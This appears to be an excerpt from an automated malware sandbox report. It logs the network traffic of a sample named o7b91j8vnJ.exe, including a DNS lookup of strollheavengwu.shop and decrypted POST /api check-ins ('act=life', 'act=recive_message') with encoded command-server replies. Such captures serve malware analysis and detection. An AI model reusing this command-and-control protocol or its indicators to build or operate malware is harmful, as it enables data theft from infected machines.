                                                  Apr 25, 2024 01:59:55.020768881 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.020831108 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.122878075 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.122920990 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.123001099 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.123308897 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.123318911 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.350574017 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.350784063 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.352168083 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.352176905 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.352377892 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.353674889 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.353801012 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.353827000 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.865180969 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.865273952 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.865330935 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.865459919 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.865473032 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.147443056 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.147492886 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.147686005 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.147948027 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.147969007 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.378156900 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.378254890 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.379575014 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.379587889 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.379796982 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.381138086 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.381289959 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.381321907 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.381405115 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.381416082 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.948148966 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.948262930 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.948322058 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.948460102 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.948481083 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.109133959 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.109210968 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.109707117 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.117667913 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.117707968 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.345380068 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.345483065 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.346775055 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.346807003 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.347023964 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.348160982 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.348295927 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.348331928 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.869036913 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.869142056 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.869204998 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.869374037 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.869398117 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.165934086 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.166039944 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.166143894 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.166541100 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.166575909 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.397083044 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.397293091 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.398644924 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.398674011 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.399130106 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.400417089 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.400517941 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.400536060 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.892728090 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.892904997 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.892973900 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.893078089 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.893120050 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.482790947 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.482896090 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.483002901 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.483318090 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.483355045 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.713880062 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.713987112 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.715706110 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.715739012 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.716116905 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.717437983 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.718386889 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.718436956 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.718548059 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.718597889 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.718733072 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.718777895 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.718936920 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.718971968 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.719155073 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.719192028 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.719382048 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.719422102 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.719446898 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.719562054 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.719609022 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.764120102 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.764328003 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.764409065 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.764435053 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.812119961 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.812279940 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.812331915 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.812360048 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.860115051 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.860294104 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.904160023 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 02:00:00.049961090 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 02:00:01.298826933 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 02:00:01.298960924 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 02:00:01.299026966 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 02:00:01.299232006 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 02:00:01.299252987 CEST44349737172.67.163.209192.168.2.4

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 25, 2024 01:59:52.426038980 CEST5670053192.168.2.41.1.1.1
                                                  Apr 25, 2024 01:59:52.562253952 CEST53567001.1.1.1192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Apr 25, 2024 01:59:52.426038980 CEST192.168.2.41.1.1.10x27f0Standard query (0)strollheavengwu.shopA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Apr 25, 2024 01:59:52.562253952 CEST1.1.1.1192.168.2.40x27f0No error (0)strollheavengwu.shop172.67.163.209A (IP address)IN (0x0001)false
                                                  Apr 25, 2024 01:59:52.562253952 CEST1.1.1.1192.168.2.40x27f0No error (0)strollheavengwu.shop104.21.15.198A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • strollheavengwu.shop

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449730172.67.163.2094436856C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-24 23:59:52 UTC267OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 8
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:52 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                  Data Ascii: act=life
                                                  2024-04-24 23:59:53 UTC810INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Apr 2024 23:59:53 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=buo3uuou9h73r1se2aoe6dl0ks; expires=Sun, 18-Aug-2024 17:46:32 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vKVPEHTJJVHG7lCGGFKCU4%2FJtu0uhD7H36q6omCQAWyWIvZclR9jBj4kUhFQYaqmjjP%2FYmllKh3e2ncn%2Bop4pIY%2F0g89Lt9J5hL9oIea06K3boq0do1AWRtqe0ambZ1iCXg70qQoiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0cb45ba74582-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-24 23:59:53 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-04-24 23:59:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449731172.67.163.2094436856C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-24 23:59:53 UTC268OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 58
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:53 UTC58OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72 73 74 61 72 26 6a 3d 64 65 66 61 75 6c 74
                                                  Data Ascii: act=recive_message&ver=4.0&lid=P6Mk0M--superstar&j=default
                                                  2024-04-24 23:59:54 UTC814INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Apr 2024 23:59:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=lshsshr90hrjrdbobfo8ocqr70; expires=Sun, 18-Aug-2024 17:46:32 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GCubdmKSuSAqMZLIlUvcS7Ctsc8%2F4FwkA5Rfuxxx9SHLMm%2FEDOT39tLFgE1TupjygB80eyhZV%2FSu4tPovnhibcVW6EqXRlpaH3j4nTvRiedjbt%2FKwUG%2FFeJNGgDoq6TM%2F5rycU2Jlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0cb93a7d53d5-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-24 23:59:54 UTC555INData Raw: 33 61 65 34 0d 0a 59 37 52 62 7a 55 4a 49 49 34 6f 71 67 72 51 35 4f 34 33 55 6f 68 4e 72 66 4e 63 33 71 73 49 51 76 32 37 37 44 49 52 38 57 4d 6f 59 76 6c 4c 76 4e 47 6f 5a 71 68 36 75 76 6a 41 5a 2f 72 47 41 4b 55 73 49 70 55 4c 50 37 68 71 32 54 4a 70 6f 70 6b 5a 34 72 41 4c 59 4b 4b 68 75 51 69 71 6f 52 2f 71 57 41 78 76 57 33 71 74 6f 59 58 58 65 46 63 2b 73 4d 6f 56 4f 32 58 76 68 48 6a 32 79 46 39 45 31 76 69 73 6e 54 63 70 48 35 38 42 59 56 75 79 6e 79 54 30 43 45 2f 55 62 6f 4d 73 5a 6e 51 75 42 4c 72 35 63 65 6f 63 47 77 44 71 41 49 7a 74 49 71 41 61 49 76 54 41 5a 36 4b 43 41 4b 55 74 65 69 78 58 61 6f 32 4c 65 41 34 68 51 70 6b 59 6a 6c 6b 48 64 4c 36 67 77 4b 56 66 6a 52 65 7a 48 5a 52 6d 33 34 70 49 6a 57 30 7a 6e 53 6f 6a 49 47 63 4a 6b 38
                                                  Data Ascii: 3ae4Y7RbzUJII4oqgrQ5O43UohNrfNc3qsIQv277DIR8WMoYvlLvNGoZqh6uvjAZ/rGAKUsIpULP7hq2TJpopkZ4rALYKKhuQiqoR/qWAxvW3qtoYXXeFc+sMoVO2XvhHj2yF9E1visnTcpH58BYVuynyT0CE/UboMsZnQuBLr5ceocGwDqAIztIqAaIvTAZ6KCAKUteixXao2LeA4hQpkYjlkHdL6gwKVfjRezHZRm34pIjW0znSojIGcJk8
                                                  2024-04-24 23:59:54 UTC1369INData Raw: 6f 31 31 65 71 38 4e 6c 6d 48 74 59 43 78 50 36 55 58 67 78 46 4e 53 35 4c 50 53 65 67 41 54 75 46 58 46 71 6e 33 65 44 4a 35 6b 37 42 45 77 72 41 7a 62 50 36 38 67 61 67 2b 41 49 34 75 57 58 45 47 76 37 6f 49 78 4b 68 75 6c 55 73 53 32 4d 4f 64 4d 38 51 58 35 55 46 48 71 51 37 35 53 74 6b 68 42 4b 71 68 50 37 4a 59 44 47 36 2b 2b 78 58 49 4b 46 62 70 57 77 4b 74 67 33 52 36 66 59 2b 4d 4d 50 4b 30 50 33 44 71 39 4b 69 52 48 36 30 48 72 33 31 35 65 36 2f 61 4f 47 57 4a 31 39 56 4c 51 34 43 71 66 54 4c 68 6a 37 52 49 77 76 77 47 57 55 63 51 2f 5a 43 6d 44 55 59 69 39 4d 42 6e 6f 75 6f 41 70 53 31 36 78 56 4d 79 68 64 74 4d 43 6e 57 4c 67 45 44 65 6e 42 39 77 35 71 43 6f 69 53 65 6c 46 36 39 6c 62 58 4f 4b 79 78 6e 30 49 47 2f 55 62 6f 4d 73 5a 6e 51 75 42
                                                  Data Ascii: o11eq8NlmHtYCxP6UXgxFNS5LPSegATuFXFqn3eDJ5k7BEwrAzbP68gag+AI4uWXEGv7oIxKhulUsS2MOdM8QX5UFHqQ75StkhBKqhP7JYDG6++xXIKFbpWwKtg3R6fY+MMPK0P3Dq9KiRH60Hr315e6/aOGWJ19VLQ4CqfTLhj7RIwvwGWUcQ/ZCmDUYi9MBnouoApS16xVMyhdtMCnWLgEDenB9w5qCoiSelF69lbXOKyxn0IG/UboMsZnQuB
                                                  2024-04-24 23:59:54 UTC1369INData Raw: 4f 74 44 73 51 7a 6f 79 45 34 52 75 46 42 36 74 64 56 56 75 53 36 78 57 4d 43 45 62 31 61 79 61 31 2f 31 67 69 5a 4c 71 68 32 55 63 4e 42 30 53 48 76 65 47 67 42 79 55 58 76 78 46 68 49 72 59 50 44 66 77 63 5a 6f 78 57 67 79 32 32 54 5a 50 4a 33 6a 6e 56 52 36 41 62 61 65 66 64 69 61 6b 44 6b 52 4f 48 5a 58 56 50 6e 74 63 46 6a 41 42 47 39 57 73 47 68 63 64 6b 4e 6b 33 7a 30 48 6a 61 36 44 64 77 2f 6f 43 30 6d 41 61 59 67 69 37 30 62 58 76 66 32 6d 44 4e 4a 4e 4c 5a 42 79 36 6f 77 36 41 2b 58 59 4f 45 49 65 73 42 71 79 58 66 48 53 7a 4d 70 67 79 4f 67 30 56 63 5a 74 2f 53 41 66 41 67 57 73 30 66 48 72 58 48 54 41 70 5a 72 36 52 59 36 71 41 7a 54 50 61 51 72 4b 55 7a 73 57 75 72 57 55 31 7a 75 76 4d 6f 78 52 33 62 65 50 6f 69 6e 61 70 31 55 32 79 37 58 43
                                                  Data Ascii: OtDsQzoyE4RuFB6tdVVuS6xWMCEb1aya1/1giZLqh2UcNB0SHveGgByUXvxFhIrYPDfwcZoxWgy22TZPJ3jnVR6AbaefdiakDkROHZXVPntcFjABG9WsGhcdkNk3z0Hja6Ddw/oC0mAaYgi70bXvf2mDNJNLZBy6ow6A+XYOEIesBqyXfHSzMpgyOg0VcZt/SAfAgWs0fHrXHTApZr6RY6qAzTPaQrKUzsWurWU1zuvMoxR3bePoinap1U2y7XC
                                                  2024-04-24 23:59:54 UTC1369INData Raw: 52 4e 61 63 6c 4a 55 66 74 52 65 66 64 57 45 76 39 74 63 52 2f 42 56 37 37 50 61 50 4c 4d 74 6f 55 32 54 61 6b 58 68 2b 2f 41 73 59 2f 72 47 42 43 4b 76 63 47 69 4c 31 43 4d 59 54 64 67 48 59 46 58 75 30 58 69 4b 42 38 30 51 65 65 5a 65 30 61 50 71 67 4d 33 54 65 68 4b 53 5a 4a 35 45 2f 79 32 31 35 52 35 62 2f 46 66 51 51 64 70 31 62 4a 34 44 79 31 5a 2f 49 75 34 51 5a 36 38 45 4f 57 48 70 77 58 43 51 47 41 49 2f 2b 59 4d 7a 4c 32 33 71 73 61 53 52 6d 35 46 5a 44 69 4d 74 77 45 6e 6d 44 69 44 44 53 36 44 39 45 35 71 53 67 69 52 75 52 47 37 73 52 54 57 4f 2b 34 7a 33 6b 41 47 72 52 52 7a 4b 78 31 6e 55 4c 78 42 59 31 65 50 62 42 42 6a 6e 76 76 43 43 6c 62 38 67 72 4f 33 56 74 65 2f 36 44 62 4d 57 46 31 71 68 75 67 79 32 75 31 5a 2f 49 75 34 52 4a 36 38 45
                                                  Data Ascii: RNaclJUftRefdWEv9tcR/BV77PaPLMtoU2TakXh+/AsY/rGBCKvcGiL1CMYTdgHYFXu0XiKB80QeeZe0aPqgM3TehKSZJ5E/y215R5b/FfQQdp1bJ4Dy1Z/Iu4QZ68EOWHpwXCQGAI/+YMzL23qsaSRm5FZDiMtwEnmDiDDS6D9E5qSgiRuRG7sRTWO+4z3kAGrRRzKx1nULxBY1ePbBBjnvvCClb8grO3Vte/6DbMWF1qhugy2u1Z/Iu4RJ68E
                                                  2024-04-24 23:59:54 UTC1369INData Raw: 4c 69 5a 4b 34 30 50 6a 33 46 4a 61 34 37 44 42 66 77 6b 51 74 52 57 47 79 42 6d 32 54 4a 35 32 70 6b 5a 34 36 43 48 64 4c 37 6f 6a 4f 6b 66 76 52 4b 43 2b 4d 45 61 68 33 71 74 6f 59 58 58 65 46 63 2b 73 4d 6f 56 4f 32 57 44 30 47 6a 75 6f 43 64 38 31 70 43 67 34 52 75 39 44 37 74 68 51 58 65 4f 2f 79 33 67 4d 45 72 52 65 77 61 56 32 31 77 71 55 4c 71 68 32 55 63 4e 42 30 53 48 76 65 47 67 42 78 45 76 76 33 52 73 78 68 4b 6d 4f 47 57 49 48 33 54 36 6a 34 48 58 52 54 4d 45 73 70 68 6b 79 6f 41 2f 56 50 36 51 73 4a 6b 44 68 54 75 58 65 58 46 62 6f 76 38 64 78 44 77 79 79 57 4d 47 67 65 64 51 47 6e 57 2f 74 58 6e 54 41 61 72 31 35 71 44 68 71 47 61 6f 49 30 74 46 4e 53 65 7a 32 71 42 6f 57 55 4e 34 39 6f 37 6b 61 74 6d 66 5a 61 65 70 65 59 75 70 42 32 79 75
                                                  Data Ascii: LiZK40Pj3FJa47DBfwkQtRWGyBm2TJ52pkZ46CHdL7ojOkfvRKC+MEah3qtoYXXeFc+sMoVO2WD0GjuoCd81pCg4Ru9D7thQXeO/y3gMErRewaV21wqULqh2UcNB0SHveGgBxEvv3RsxhKmOGWIH3T6j4HXRTMEsphkyoA/VP6QsJkDhTuXeXFbov8dxDwyyWMGgedQGnW/tXnTAar15qDhqGaoI0tFNSez2qBoWUN49o7katmfZaepeYupB2yu
                                                  2024-04-24 23:59:54 UTC1369INData Raw: 62 41 4b 6f 4e 64 58 56 75 79 35 77 33 49 49 46 4b 64 48 78 4b 6c 36 32 41 43 53 59 4f 41 4d 50 4b 63 49 31 54 71 6d 4a 79 4a 4e 34 6b 76 6e 6c 68 55 78 68 4e 32 41 64 68 46 65 37 52 65 49 67 32 58 4e 41 64 6b 47 6a 51 46 30 77 47 72 50 55 63 52 4c 61 6b 62 6b 43 4c 69 55 47 31 48 69 76 73 70 31 44 68 4f 79 55 38 47 79 65 39 67 43 6d 57 72 74 45 54 79 73 41 74 59 72 71 53 51 69 51 75 56 46 37 74 56 66 47 61 48 65 71 78 70 4a 47 61 30 56 6b 4f 49 79 37 77 47 58 64 65 6b 5a 4b 36 4a 42 76 6c 4b 77 62 6b 49 71 38 53 43 4c 76 52 74 65 34 2f 61 59 4d 30 6b 61 75 30 66 44 6f 58 6e 57 41 70 35 68 34 78 51 36 70 77 58 56 4e 36 51 68 4b 55 6e 6c 52 65 37 63 55 6c 44 6f 75 73 52 32 53 56 44 64 50 71 50 67 64 63 56 4d 77 53 79 6d 4e 52 75 46 4c 64 45 6a 37 30 68 42
                                                  Data Ascii: bAKoNdXVuy5w3IIFKdHxKl62ACSYOAMPKcI1TqmJyJN4kvnlhUxhN2AdhFe7ReIg2XNAdkGjQF0wGrPUcRLakbkCLiUG1Hivsp1DhOyU8Gye9gCmWrtETysAtYrqSQiQuVF7tVfGaHeqxpJGa0VkOIy7wGXdekZK6JBvlKwbkIq8SCLvRte4/aYM0kau0fDoXnWAp5h4xQ6pwXVN6QhKUnlRe7cUlDousR2SVDdPqPgdcVMwSymNRuFLdEj70hB
                                                  2024-04-24 23:59:54 UTC1369INData Raw: 66 61 54 56 4c 75 74 64 5a 38 47 56 37 64 50 74 66 75 47 72 59 56 38 51 57 4e 58 6a 32 6b 51 59 35 37 37 79 59 6a 52 2b 39 4f 37 73 52 65 58 2b 43 35 79 58 67 4e 46 72 5a 56 7a 4b 52 31 32 41 2b 56 5a 65 45 64 4e 61 77 49 32 44 43 67 59 47 51 70 67 79 4f 67 30 55 4d 5a 74 2f 53 41 55 42 49 64 75 56 69 49 79 42 6e 43 51 76 45 46 2f 33 5a 52 77 30 48 52 4e 65 39 34 61 41 48 6b 52 75 58 57 55 56 2f 72 73 38 5a 37 44 42 36 2b 56 73 65 6b 64 4e 6b 44 6d 57 58 76 48 7a 79 74 43 39 30 2f 6f 69 4d 73 52 36 67 47 69 4c 30 77 47 65 69 75 67 43 6c 4c 58 70 56 4f 78 61 78 31 6e 57 54 79 63 61 68 32 55 62 46 70 76 56 4c 76 4a 79 59 42 73 41 71 67 33 56 64 64 36 4c 62 4e 63 67 45 62 73 56 2f 4e 6f 48 72 50 42 4a 6c 70 39 41 77 36 6f 51 54 61 4f 71 38 6b 4c 45 6a 75 53
                                                  Data Ascii: faTVLutdZ8GV7dPtfuGrYV8QWNXj2kQY577yYjR+9O7sReX+C5yXgNFrZVzKR12A+VZeEdNawI2DCgYGQpgyOg0UMZt/SAUBIduViIyBnCQvEF/3ZRw0HRNe94aAHkRuXWUV/rs8Z7DB6+VsekdNkDmWXvHzytC90/oiMsR6gGiL0wGeiugClLXpVOxax1nWTycah2UbFpvVLvJyYBsAqg3Vdd6LbNcgEbsV/NoHrPBJlp9Aw6oQTaOq8kLEjuS
                                                  2024-04-24 23:59:54 UTC1369INData Raw: 58 68 39 32 72 4d 52 46 65 37 52 65 49 6c 58 48 54 41 70 35 34 39 31 4d 64 70 67 62 58 4c 37 38 33 4a 51 47 6d 49 49 75 39 47 31 2b 76 37 6f 49 69 52 33 62 65 50 6f 69 6b 59 35 31 55 32 7a 36 30 52 57 2f 37 56 6f 5a 72 78 30 73 31 44 34 41 6a 2b 62 34 77 4d 71 2b 67 67 43 6c 4c 54 50 73 39 6f 38 73 79 7a 30 7a 42 4c 4b 5a 5a 4f 62 6f 54 30 44 71 35 49 32 31 2f 31 6d 2f 32 33 46 78 4a 36 4b 48 50 4d 55 64 32 33 6a 36 49 72 7a 4b 46 54 71 41 47 6a 58 56 52 36 41 6a 52 49 72 34 32 4a 31 48 76 43 49 69 39 4d 47 61 68 33 71 73 61 53 51 62 31 44 59 72 67 52 39 34 43 6c 32 6e 77 44 33 65 50 46 39 77 2b 76 79 63 39 54 71 67 47 69 4c 30 77 47 65 6e 32 6d 44 4e 61 55 4e 30 2b 6f 2b 42 32 7a 45 7a 42 4c 4c 5a 4d 59 66 31 53 67 57 6e 39 53 45 46 65 70 69 43 4c 7a 7a
                                                  Data Ascii: Xh92rMRFe7ReIlXHTAp5491MdpgbXL783JQGmIIu9G1+v7oIiR3bePoikY51U2z60RW/7VoZrx0s1D4Aj+b4wMq+ggClLTPs9o8syz0zBLKZZOboT0Dq5I21/1m/23FxJ6KHPMUd23j6IrzKFTqAGjXVR6AjRIr42J1HvCIi9MGah3qsaSQb1DYrgR94Cl2nwD3ePF9w+vyc9TqgGiL0wGen2mDNaUN0+o+B2zEzBLLZMYf1SgWn9SEFepiCLzz
